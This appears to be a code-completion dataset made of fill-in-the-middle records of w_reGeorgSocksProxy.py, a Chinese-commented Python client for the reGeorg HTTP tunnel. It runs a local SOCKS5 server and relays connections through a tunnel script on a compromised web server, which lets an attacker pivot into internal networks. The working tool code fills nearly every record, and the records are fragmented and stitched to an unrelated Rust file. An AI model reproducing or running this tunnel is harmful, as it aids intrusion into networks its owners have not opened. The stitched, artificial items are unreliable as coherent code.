logger.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on, args.listen_port, args.url))
logger.info("Checking if Georg is ready")
# 查看shell连通性
if not askgeorg(url=args.url):
logger.info("Georg is not ready, please check url")
exit()
READBUFSIZE = args.read_buff
# 创建socket
servSock = socket(AF_INET, SOCK_STREAM)
servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# 127.0.0.1:8889,ubuntu中proxychains监听8889端口
servSock.bind((args.listen_on, args.listen_port))
servSock.listen(1000)
while True:
try:
sock, addr_info = servSock.accept()
sock.settimeout(SOCKTIMEOUT)
logger.debug("Incomming connection")
# 发起传输数据请求
session(sock, args.url).start()
except KeyboardInterrupt, ex:
break
except Exception, e:
logger.error(e)
servSock.close()
| t(1)
| identifier_name |
w_reGeorgSocksProxy.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from traceback import format_exc
import time
import argparse
from urlparse import urlparse
from socket import *
from threading import Thread
import requests
from handle_log import logger
# Constants
SOCKTIMEOUT = 5
RESENDTIMEOUT = 300
VER = "\x05"
METHOD = "\x00"
SUCCESS = "\x00"
SOCKFAIL = "\x01"
NETWORKFAIL = "\x02"
HOSTFAIL = "\x04"
REFUSED = "\x05"
TTLEXPIRED = "\x06"
UNSUPPORTCMD = "\x07"
ADDRTYPEUNSPPORT = "\x08"
UNASSIGNED = "\x09"
BASICCHECKSTRING = "Georg says, 'All seems fine'"
# Globals
READBUFSIZE = 1024
HEADER = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
}
TIMEOUT = (5, 5)
class SocksCmdNotImplemented(Exception):
pass
class SocksProtocolNotImplemented(Exception):
pass
class RemoteConnectionFailed(Exception):
pass
class session(Thread):
def __init__(self, pSocket, connectString):
Thread.__init__(self)
self.pSocket = pSocket
self.connectString = connectString
o = urlparse(connectString)
try:
self.httpPort = o.port
except:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
else:
if not o.port:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
self.httpScheme = o.scheme
self.httpHost = o.netloc.split(":")[0]
self.httpPath = o.path
self.cookie = None
def parseSocks5(self, sock):
logger.debug("SocksVersion5 detected")
# 02:00
nmethods, methods = (sock.recv(1), sock.recv(1))
# 05:00
sock.sendall(VER + METHOD)
# :02
ver = sock.recv(1)
if ver == "\x02": # this is a hack for proxychains
# 05:01:00:01----:c0:a8:01:02:00:50
# '\x05', '\x01', '\x00', '\x01'
ver, cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1))
else:
cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1))
target = None
targetPort = None
if atyp == "\x01": # IPv4
# Reading 6 bytes for the IP and Port
# c0:a8:01:02
target = sock.recv(4)
# 00:50
targetPort = sock.recv(2)
# 目标地址192.168.2.1
self.target = ".".join([str(ord(i)) for i in target])
elif atyp == "\x03": # Hostname
targetLen = ord(sock.recv(1)) # hostname length (1 byte)
target = sock.recv(targetLen)
targetPort = sock.recv(2)
target = "".join([unichr(ord(i)) for i in target])
elif atyp == "\x04": # IPv6
target = sock.recv(16)
targetPort = sock.recv(2)
tmp_addr = []
for i in xrange(len(target) / 2):
tmp_addr.append(unichr(ord(target[2 * i]) * 256 + ord(target[2 * i + 1])))
target = ":".join(tmp_addr)
# 80
self.targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1])
if cmd == "\x02": # BIND
raise SocksCmdNotImplemented("Socks5 - BIND not implemented")
elif cmd == "\x03": # UDP
raise SocksCmdNotImplemented("Socks5 - UDP not implemented")
elif cmd == "\x01": # CONNECT
serverIp = target
try:
serverIp = gethostbyname(self.target)
except:
logger.error("oeps")
# 又转回来\xc0\xa8\x02\x01
serverIp = "".join([chr(int(i)) for i in serverIp.split(".")])
# 获取cookie,在服务端的脚本中,会执行相应端口探测
self.cookie = self.setupRemoteSession(target=self.target, targetPort=str(self.targetPort))
if self.cookie:
sock.sendall(VER + SUCCESS + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return True
else:
sock.sendall(VER + REFUSED + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return False
def handleSocks(self, sock):
# 通过proxychain模拟客户端发送数据,第一个字节可以判断是socks5还是socks4
ver = sock.recv(1)
# 05:02:00:02
if ver == "\x05":
return self.parseSocks5(sock)
def setupRemoteSession(self, target, targetPort):
"""探测端口存活"""
header = ({"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": targetPort})
cookie = None
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
return
else:
if response: | elif response_header.get("X-ERROR"):
logger.error(response_header.get("X-ERROR"))
else:
logger.error("[%s:%s] HTTP [%d]" % (target, targetPort, response.status_code))
return cookie
def closeRemoteSession(self):
header = {"X-CMD": "DISCONNECT", "Cookie": self.cookie}
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
logger.error("Close Connection Failure")
else:
if response.status_code == 200:
logger.info("[%s:%d] Connection Terminated" % (self.httpHost, self.httpPort))
def reader(self):
while True:
try:
if not self.pSocket:
break
header = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"}
response = requests.post(url=self.connectString, headers=header, data=None)
response_data = None
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
response_data = response.content
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("X-ERROR")))
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
if response_data is None:
# Remote socket closed
break
if len(response_data) == 0:
time.sleep(0.1)
continue
self.pSocket.send(response_data)
except Exception, ex:
print(format_exc())
raise ex
self.closeRemoteSession()
logger.debug("[%s:%d] Closing localsocket" % (self.target, self.targetPort))
try:
self.pSocket.close()
except:
logger.debug("[%s:%d] Localsocket already closed" % (self.target, self.targetPort))
def writer(self):
global READBUFSIZE
while True:
try:
self.pSocket.settimeout(1)
# 'GET / HTTP/1.1\r\nHost: 192.168.2.1\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n'
data = self.pSocket.recv(READBUFSIZE)
if not data:
break
header = {"X-CMD": "FORWARD", "Cookie": self.cookie, "Content-Type": "application/octet-stream",
"Connection": "Keep-Alive"}
# 携带数据
response = requests.post(url=self.connectString, headers=header, data=data)
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
if response_header.get("set-cookie") is not None:
self.cookie = response_header.get("set-cookie")
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("x-error")))
break
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
break
# transferLog.info("[%s:%d] >>>> [%d]" % (self.target, self.port, len(data)))
except timeout:
continue
except Exception, ex:
raise ex
self.closeRemoteSession()
logger.debug("Closing localsocket")
try:
self.pSocket.close()
except:
logger.debug("Localsocket already closed")
def run(self):
try:
if self.handleSocks(self.pSocket):
r = Thread(target=self.reader, args=())
r.start()
w = Thread(target=self.writer, args=())
w.start()
w.join()
r.join()
except Exception, e:
# 报错关闭连接
logger.error(format_exc())
self.closeRemoteSession()
self.pSocket.close()
def askgeorg(url):
"""检测reg连接方法"""
try:
response = requests.get(url=url, headers=HEADER, timeout=TIMEOUT)
except Exception, e:
return False
else:
if response:
text = response.text.strip()
if response.status_code == 200 and text == "Georg says, 'All seems fine'":
logger.info(text)
return True
else:
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller')
parser.add_argument("-l", "--listen-on", metavar="", help="The default listening address", default="127.0.0.1")
parser.add_argument("-p", "--listen-port", metavar="", help="The default listening port", type=int, default="8888")
parser.add_argument("-r", "--read-buff", metavar="", help="Local read buffer, max data to be sent per POST",
type=int, default="1024")
parser.add_argument("-u", "--url", metavar="", required=True, help="The url containing the tunnel script")
# 取消了原通过命令行指定log级别,通过配置文件指定
# parser.add_argument("-v", "--verbose", metavar="", help="Verbose output[INFO|DEBUG]", default="INFO")
args = parser.parse_args()
logger.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on, args.listen_port, args.url))
logger.info("Checking if Georg is ready")
# 查看shell连通性
if not askgeorg(url=args.url):
logger.info("Georg is not ready, please check url")
exit()
READBUFSIZE = args.read_buff
# 创建socket
servSock = socket(AF_INET, SOCK_STREAM)
servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# 127.0.0.1:8889,ubuntu中proxychains监听8889端口
servSock.bind((args.listen_on, args.listen_port))
servSock.listen(1000)
while True:
try:
sock, addr_info = servSock.accept()
sock.settimeout(SOCKTIMEOUT)
logger.debug("Incomming connection")
# 发起传输数据请求
session(sock, args.url).start()
except KeyboardInterrupt, ex:
break
except Exception, e:
logger.error(e)
servSock.close() | response_header = response.headers
if response.status_code == 200 and response_header.get("X-STATUS") == "OK":
cookie = response_header.get("Set-Cookie")
logger.info("[%s:%s] HTTP [200]: cookie [%s]" % (target, targetPort, cookie)) | random_line_split |
w_reGeorgSocksProxy.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from traceback import format_exc
import time
import argparse
from urlparse import urlparse
from socket import *
from threading import Thread
import requests
from handle_log import logger
# Constants
SOCKTIMEOUT = 5
RESENDTIMEOUT = 300
VER = "\x05"
METHOD = "\x00"
SUCCESS = "\x00"
SOCKFAIL = "\x01"
NETWORKFAIL = "\x02"
HOSTFAIL = "\x04"
REFUSED = "\x05"
TTLEXPIRED = "\x06"
UNSUPPORTCMD = "\x07"
ADDRTYPEUNSPPORT = "\x08"
UNASSIGNED = "\x09"
BASICCHECKSTRING = "Georg says, 'All seems fine'"
# Globals
READBUFSIZE = 1024
HEADER = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
}
TIMEOUT = (5, 5)
class SocksCmdNotImplemented(Exception):
pass
class SocksProtocolNotImplemented(Exception):
pass
class RemoteConnectionFailed(Exception):
pass
class session(Thread):
def __init__(self, pSocket, connectString):
Thread.__init__(self)
self.pSocket = pSocket
self.connectString = connectString
o = urlparse(connectString)
try:
self.httpPort = o.port
except:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
else:
if not o.port:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
self.httpScheme = o.scheme
self.httpHost = o.netloc.split(":")[0]
self.httpPath = o.path
self.cookie = None
def parseSocks5(self, sock):
logger.debug("SocksVersion5 detected")
# 02:00
nmethods, methods = (sock.recv(1), sock.recv(1))
# 05:00
sock.sendall(VER + METHOD)
# :02
ver = sock.recv(1)
if ver == "\x02": # this is a hack for proxychains
# 05:01:00:01----:c0:a8:01:02:00:50
# '\x05', '\x01', '\x00', '\x01'
ver, cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1))
else:
cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1))
target = None
targetPort = None
if atyp == "\x01": # IPv4
# Reading 6 bytes for the IP and Port
# c0:a8:01:02
target = sock.recv(4)
# 00:50
targetPort = sock.recv(2)
# 目标地址192.168.2.1
self.target = ".".join([str(ord(i)) for i in target])
elif atyp == "\x03": # Hostname
targetLen = ord(sock.recv(1)) # hostname length (1 byte)
target = sock.recv(targetLen)
targetPort = sock.recv(2)
target = "".join([unichr(ord(i)) for i in target])
elif atyp == "\x04": # IPv6
target = sock.recv(16)
targetPort = sock.recv(2)
tmp_addr = []
for i in xrange(len(target) / 2):
tmp_addr.append(unichr(ord(target[2 * i]) * 256 + ord(target[2 * i + 1])))
target = ":".join(tmp_addr)
# 80
self.targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1])
if cmd == "\x02": # BIND
raise SocksCmdNotImplemented("Socks5 - BIND not implemented")
elif cmd == "\x03": # UDP
raise SocksCmdNotImplemented("Socks5 - UDP not implemented")
elif cmd == "\x01": # CONNECT
serverIp = target
try:
serverIp = gethostbyname(self.target)
except:
logger.error("oeps")
# 又转回来\xc0\xa8\x02\x01
serverIp = "".join([chr(int(i)) for i in serverIp.split(".")])
# 获取cookie,在服务端的脚本中,会执行相应端口探测
self.cookie = self.setupRemoteSession(target=self.target, targetPort=str(self.targetPort))
if self.cookie:
sock.sendall(VER + SUCCESS + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return True
else:
sock.sendall(VER + REFUSED + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return False
def handleSocks(self, sock):
# 通过proxychain模拟客户端发送数据,第一个字节可以判断是socks5还是socks4
ver = sock.recv(1)
# 05:02:00:02
if ver == "\x05":
return self.parseSocks5(sock)
def setupRemoteSession(self, target, targetPort):
"""探测端口存活"""
header = ({"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": targetPort})
cookie = None
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
return
else:
if response:
response_header = response.headers
if response.status_code == 200 and response_header.get("X-STATUS") == "OK":
cookie = response_header.get("Set-Cookie")
logger.info("[%s:%s] HTTP [200]: cookie [%s]" % (target, targetPort, cookie))
elif response_header.get("X-ERROR"):
logger.error(response_header.get("X-ERROR"))
else:
logger.error("[%s:%s] HTTP [%d]" % (target, targetPort, response.status_code))
return cookie
def closeRemoteSession(self):
header = {"X-CMD": "DISCONNECT", "Cookie": self.cookie}
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
logger.error("Close Connection Failure")
else:
if response.status_code == 200:
logger.info("[%s:%d] Connection Terminated" % (self.httpHost, self.httpPort))
def reader(self):
while True:
try:
if not self.pSocket:
break
header = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"}
response = requests.post(url=self.connectString, headers=header, data=None)
response_data = None
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
response_data = response.content
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("X-ERROR")))
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
if response_data is None:
# Remote socket closed
break
if len(response_data) == 0:
time.sleep(0.1)
continue
self.pSocket.send(response_data)
except Exception, ex:
print(format_exc())
raise ex
self.closeRemoteSession()
logger.debug("[%s:%d] Closing localsocket" % (self.target, self.targetPort))
try:
self.pSocket.close()
except:
logger.debug("[%s:%d] Localsocket already closed" % (self.target, self.targetPort))
def writer(self):
global READBUFSIZE
while True:
try:
self.pSocket.settimeout(1)
# 'GET / HTTP/1.1\r\nHost: 192.168.2.1\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n'
data = self.pSocket.recv(READBUFSIZE)
if not data:
break
header = {"X-CMD": "FORWARD", "Cookie": self.cookie, "Content-Type": "application/octet-stream",
"Connection": "Keep-Alive"}
# 携带数据
response = requests.post(url=self.connectString, headers=header, data=data)
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
if response_header.get("set-cookie") is not None:
self.cookie = response_header.get("set-cookie")
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.tar | target, self.targetPort, response.status_code))
break
# transferLog.info("[%s:%d] >>>> [%d]" % (self.target, self.port, len(data)))
except timeout:
continue
except Exception, ex:
raise ex
self.closeRemoteSession()
logger.debug("Closing localsocket")
try:
self.pSocket.close()
except:
logger.debug("Localsocket already closed")
def run(self):
try:
if self.handleSocks(self.pSocket):
r = Thread(target=self.reader, args=())
r.start()
w = Thread(target=self.writer, args=())
w.start()
w.join()
r.join()
except Exception, e:
# 报错关闭连接
logger.error(format_exc())
self.closeRemoteSession()
self.pSocket.close()
def askgeorg(url):
"""检测reg连接方法"""
try:
response = requests.get(url=url, headers=HEADER, timeout=TIMEOUT)
except Exception, e:
return False
else:
if response:
text = response.text.strip()
if response.status_code == 200 and text == "Georg says, 'All seems fine'":
logger.info(text)
return True
else:
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller')
parser.add_argument("-l", "--listen-on", metavar="", help="The default listening address", default="127.0.0.1")
parser.add_argument("-p", "--listen-port", metavar="", help="The default listening port", type=int, default="8888")
parser.add_argument("-r", "--read-buff", metavar="", help="Local read buffer, max data to be sent per POST",
type=int, default="1024")
parser.add_argument("-u", "--url", metavar="", required=True, help="The url containing the tunnel script")
# 取消了原通过命令行指定log级别,通过配置文件指定
# parser.add_argument("-v", "--verbose", metavar="", help="Verbose output[INFO|DEBUG]", default="INFO")
args = parser.parse_args()
logger.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on, args.listen_port, args.url))
logger.info("Checking if Georg is ready")
# 查看shell连通性
if not askgeorg(url=args.url):
logger.info("Georg is not ready, please check url")
exit()
READBUFSIZE = args.read_buff
# 创建socket
servSock = socket(AF_INET, SOCK_STREAM)
servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# 127.0.0.1:8889,ubuntu中proxychains监听8889端口
servSock.bind((args.listen_on, args.listen_port))
servSock.listen(1000)
while True:
try:
sock, addr_info = servSock.accept()
sock.settimeout(SOCKTIMEOUT)
logger.debug("Incomming connection")
# 发起传输数据请求
session(sock, args.url).start()
except KeyboardInterrupt, ex:
break
except Exception, e:
logger.error(e)
servSock.close()
| getPort, response.status_code, status, response_header.get("x-error")))
break
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self. | conditional_block |
w_reGeorgSocksProxy.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from traceback import format_exc
import time
import argparse
from urlparse import urlparse
from socket import *
from threading import Thread
import requests
from handle_log import logger
# Constants
SOCKTIMEOUT = 5
RESENDTIMEOUT = 300
VER = "\x05"
METHOD = "\x00"
SUCCESS = "\x00"
SOCKFAIL = "\x01"
NETWORKFAIL = "\x02"
HOSTFAIL = "\x04"
REFUSED = "\x05"
TTLEXPIRED = "\x06"
UNSUPPORTCMD = "\x07"
ADDRTYPEUNSPPORT = "\x08"
UNASSIGNED = "\x09"
BASICCHECKSTRING = "Georg says, 'All seems fine'"
# Globals
READBUFSIZE = 1024
HEADER = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
}
TIMEOUT = (5, 5)
class SocksCmdNotImplemented(Exception):
pass
class SocksProtocolNotImplemented(Exception):
pass
class RemoteConnectionFailed(Exception):
pass
class session(Thread):
# One thread per proxied client connection: pSocket is the local SOCKS client
# socket, connectString is the URL of the server-side tunnel script.
def __init__(self, pSocket, connectString):
Thread.__init__(self)
self.pSocket = pSocket
self.connectString = connectString
o = urlparse(connectString)
# Accessing o.port can raise (malformed port in the URL); fall back to the
# scheme's default port in that case.
try:
self.httpPort = o.port
except:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
else:
# No explicit port in the URL: pick the default for the scheme.
if not o.port:
if o.scheme == "https":
self.httpPort = 443
else:
self.httpPort = 80
self.httpScheme = o.scheme
self.httpHost = o.netloc.split(":")[0]
self.httpPath = o.path
# Session cookie issued by the tunnel script once CONNECT succeeds.
self.cookie = None
def parseSocks5(self, sock):
"""Parse a SOCKS5 (RFC 1928) greeting and CONNECT request from the client,
then ask the tunnel script to open the remote connection.
Returns True on success, False if the remote session could not be set up."""
logger.debug("SocksVersion5 detected")
# 02:00
nmethods, methods = (sock.recv(1), sock.recv(1))
# 05:00
sock.sendall(VER + METHOD)
# :02
ver = sock.recv(1)
if ver == "\x02": # this is a hack for proxychains
# 05:01:00:01----:c0:a8:01:02:00:50
# '\x05', '\x01', '\x00', '\x01'
ver, cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1), sock.recv(1))
else:
cmd, rsv, atyp = (sock.recv(1), sock.recv(1), sock.recv(1))
target = None
targetPort = None
if atyp == "\x01": # IPv4
# Reading 6 bytes for the IP and Port
# c0:a8:01:02
target = sock.recv(4)
# 00:50
targetPort = sock.recv(2)
# Target address, e.g. 192.168.2.1 (dotted quad built from the raw bytes).
self.target = ".".join([str(ord(i)) for i in target])
elif atyp == "\x03": # Hostname
targetLen = ord(sock.recv(1)) # hostname length (1 byte)
target = sock.recv(targetLen)
targetPort = sock.recv(2)
# NOTE(review): self.target is only assigned in the IPv4 branch above; for
# hostname/IPv6 requests gethostbyname(self.target) below will fail — verify.
target = "".join([unichr(ord(i)) for i in target])
elif atyp == "\x04": # IPv6
target = sock.recv(16)
targetPort = sock.recv(2)
tmp_addr = []
for i in xrange(len(target) / 2):
tmp_addr.append(unichr(ord(target[2 * i]) * 256 + ord(target[2 * i + 1])))
target = ":".join(tmp_addr)
# Port is a big-endian 16-bit value, e.g. 80.
self.targetPort = ord(targetPort[0]) * 256 + ord(targetPort[1])
if cmd == "\x02": # BIND
raise SocksCmdNotImplemented("Socks5 - BIND not implemented")
elif cmd == "\x03": # UDP
raise SocksCmdNotImplemented("Socks5 - UDP not implemented")
elif cmd == "\x01": # CONNECT
serverIp = target
try:
serverIp = gethostbyname(self.target)
except:
logger.error("oeps")
# Convert the dotted quad back into 4 raw bytes, e.g. "\xc0\xa8\x02\x01".
serverIp = "".join([chr(int(i)) for i in serverIp.split(".")])
# Ask the server-side script to CONNECT; on success it returns a session
# cookie used by all subsequent READ/FORWARD requests.
self.cookie = self.setupRemoteSession(target=self.target, targetPort=str(self.targetPort))
if self.cookie:
sock.sendall(VER + SUCCESS + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return True
else:
sock.sendall(VER + REFUSED + "\x00" + "\x01" + serverIp + chr(self.targetPort / 256) + chr(
self.targetPort % 256))
return False
def handleSocks(self, sock):
# The first byte of the client's greeting (e.g. sent via proxychains)
# identifies the protocol version: 0x05 = SOCKS5, 0x04 = SOCKS4.
ver = sock.recv(1)
# 05:02:00:02
if ver == "\x05":
return self.parseSocks5(sock)
# NOTE(review): any other version falls through and returns None, which
# the caller treats as a failed handshake.
def setupRemoteSession(self, target, targetPort):
"""Ask the server-side tunnel script to CONNECT to target:targetPort
(probes the remote port). Returns the session cookie on success, else None."""
header = ({"X-CMD": "CONNECT", "X-TARGET": target, "X-PORT": targetPort})
cookie = None
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
# Network failure talking to the tunnel script; caller sees None.
return
else:
if response:
response_header = response.headers
if response.status_code == 200 and response_header.get("X-STATUS") == "OK":
cookie = response_header.get("Set-Cookie")
logger.info("[%s:%s] HTTP [200]: cookie [%s]" % (target, targetPort, cookie))
elif response_header.get("X-ERROR"):
logger.error(response_header.get("X-ERROR"))
else:
logger.error("[%s:%s] HTTP [%d]" % (target, targetPort, response.status_code))
return cookie
def closeRemoteSession(self):
# Tell the server-side script to tear down the remote socket for this session.
header = {"X-CMD": "DISCONNECT", "Cookie": self.cookie}
try:
response = requests.post(url=self.connectString, headers=header, data=None, timeout=TIMEOUT)
except Exception, e:
logger.error("Close Connection Failure")
else:
if response.status_code == 200:
logger.info("[%s:%d] Connection Terminated" % (self.httpHost, self.httpPort))
def reader(self):
"""Pump loop: poll the tunnel script with X-CMD: READ and forward any
bytes it returns to the local SOCKS client socket."""
while True:
try:
if not self.pSocket:
break
header = {"X-CMD": "READ", "Cookie": self.cookie, "Connection": "Keep-Alive"}
response = requests.post(url=self.connectString, headers=header, data=None)
response_data = None
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
response_data = response.content
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("X-ERROR")))
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
if response_data is None:
# Remote socket closed
break
if len(response_data) == 0:
# Nothing pending remotely; back off briefly before polling again.
time.sleep(0.1)
continue
self.pSocket.send(response_data)
except Exception, ex:
print(format_exc())
raise ex
# Loop exited (remote closed or error): clean up both ends.
self.closeRemoteSession()
logger.debug("[%s:%d] Closing localsocket" % (self.target, self.targetPort))
try:
self.pSocket.close()
except:
logger.debug("[%s:%d] Localsocket already closed" % (self.target, self.targetPort))
def writer(self):
"""Pump loop: read bytes from the local SOCKS client and POST them to the
tunnel script with X-CMD: FORWARD until the client closes."""
global READBUFSIZE
while True:
try:
# Short timeout so the loop can notice a dead peer promptly.
self.pSocket.settimeout(1)
# 'GET / HTTP/1.1\r\nHost: 192.168.2.1\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n'
data = self.pSocket.recv(READBUFSIZE)
if not data:
break
header = {"X-CMD": "FORWARD", "Cookie": self.cookie, "Content-Type": "application/octet-stream",
"Connection": "Keep-Alive"}
# The POST body carries the raw bytes to be forwarded to the remote socket.
response = requests.post(url=self.connectString, headers=header, data=data)
if response.status_code == 200:
response_header = response.headers
status = response_header.get("x-status")
if status == "OK":
# The server may rotate the session cookie; keep the latest one.
if response_header.get("set-cookie") is not None:
self.cookie = response_header.get("set-cookie")
else:
logger.error("[%s:%d] HTTP [%d]: Status: [%s]: Message [%s] Shutting down" % (
self.target, self.targetPort, response.status_code, status, response_header.get("x-error")))
break
else:
logger.error(
"[%s:%d] HTTP [%d]: Shutting down" % (self.target, self.targetPort, response.status_code))
break
# transferLog.info("[%s:%d] >>>> [%d]" % (self.target, self.port, len(data)))
except timeout:
# recv timed out with no data — loop and try again.
continue
except Exception, ex:
raise ex
self.closeRemoteSession()
logger.debug("Closing localsocket")
try:
self.pSocket.close()
except:
logger.debug("Localsocket already closed")
def run(self):
try:
if self.handleSocks(self.pSocket):
r = Thread(target=self.reader, args=())
| Exception, e:
return False
else:
if response:
text = response.text.strip()
if response.status_code == 200 and text == "Georg says, 'All seems fine'":
logger.info(text)
return True
else:
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Socks server for reGeorg HTTP(s) tunneller')
parser.add_argument("-l", "--listen-on", metavar="", help="The default listening address", default="127.0.0.1")
parser.add_argument("-p", "--listen-port", metavar="", help="The default listening port", type=int, default="8888")
parser.add_argument("-r", "--read-buff", metavar="", help="Local read buffer, max data to be sent per POST",
type=int, default="1024")
parser.add_argument("-u", "--url", metavar="", required=True, help="The url containing the tunnel script")
# 取消了原通过命令行指定log级别,通过配置文件指定
# parser.add_argument("-v", "--verbose", metavar="", help="Verbose output[INFO|DEBUG]", default="INFO")
args = parser.parse_args()
logger.info("Starting socks server [%s:%d], tunnel at [%s]" % (args.listen_on, args.listen_port, args.url))
logger.info("Checking if Georg is ready")
# 查看shell连通性
if not askgeorg(url=args.url):
logger.info("Georg is not ready, please check url")
exit()
READBUFSIZE = args.read_buff
# 创建socket
servSock = socket(AF_INET, SOCK_STREAM)
servSock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
# 127.0.0.1:8889,ubuntu中proxychains监听8889端口
servSock.bind((args.listen_on, args.listen_port))
servSock.listen(1000)
while True:
try:
sock, addr_info = servSock.accept()
sock.settimeout(SOCKTIMEOUT)
logger.debug("Incomming connection")
# 发起传输数据请求
session(sock, args.url).start()
except KeyboardInterrupt, ex:
break
except Exception, e:
logger.error(e)
servSock.close()
| r.start()
w = Thread(target=self.writer, args=())
w.start()
w.join()
r.join()
except Exception, e:
# 报错关闭连接
logger.error(format_exc())
self.closeRemoteSession()
self.pSocket.close()
def askgeorg(url):
"""检测reg连接方法"""
try:
response = requests.get(url=url, headers=HEADER, timeout=TIMEOUT)
except | identifier_body |
activity_heartbeat_manager.rs | use crate::task_token::TaskToken;
use crate::{
errors::ActivityHeartbeatError,
protos::{
coresdk::{common, ActivityHeartbeat, PayloadsExt},
temporal::api::workflowservice::v1::RecordActivityTaskHeartbeatResponse,
},
ServerGatewayApis,
};
use std::{
collections::HashMap,
sync::{
atomic::{AtomicBool, Ordering},
Arc,
},
time::{self, Duration},
};
use tokio::{
select,
sync::{
mpsc::{unbounded_channel, UnboundedReceiver, UnboundedSender},
watch::{channel, Receiver, Sender},
Mutex,
},
task::{JoinError, JoinHandle},
time::sleep,
};
pub(crate) struct ActivityHeartbeatManager<SG> {
/// Core will aggregate activity heartbeats for each activity and send them to the server
/// periodically. This map contains sender channel for each activity, identified by the task
/// token, that has an active heartbeat processor.
heartbeat_processors: HashMap<TaskToken, ActivityHeartbeatProcessorHandle>,
events_tx: UnboundedSender<LifecycleEvent>,
events_rx: UnboundedReceiver<LifecycleEvent>,
shutdown_tx: Sender<bool>,
shutdown_rx: Receiver<bool>,
cancels_tx: UnboundedSender<TaskToken>,
server_gateway: Arc<SG>,
}
/// Used to supply new heartbeat events to the activity heartbeat manager, or to send a shutdown
/// request.
pub(crate) struct ActivityHeartbeatManagerHandle {
shutting_down: AtomicBool,
events: UnboundedSender<LifecycleEvent>,
/// Cancellations that have been received when heartbeating are queued here and can be consumed
/// by [fetch_cancellations]
incoming_cancels: Mutex<UnboundedReceiver<TaskToken>>,
/// Used during `shutdown` to await until all inflight requests are sent.
join_handle: Mutex<Option<JoinHandle<()>>>,
}
/// Used to supply heartbeat details to the heartbeat processor, which periodically sends them to
/// the server.
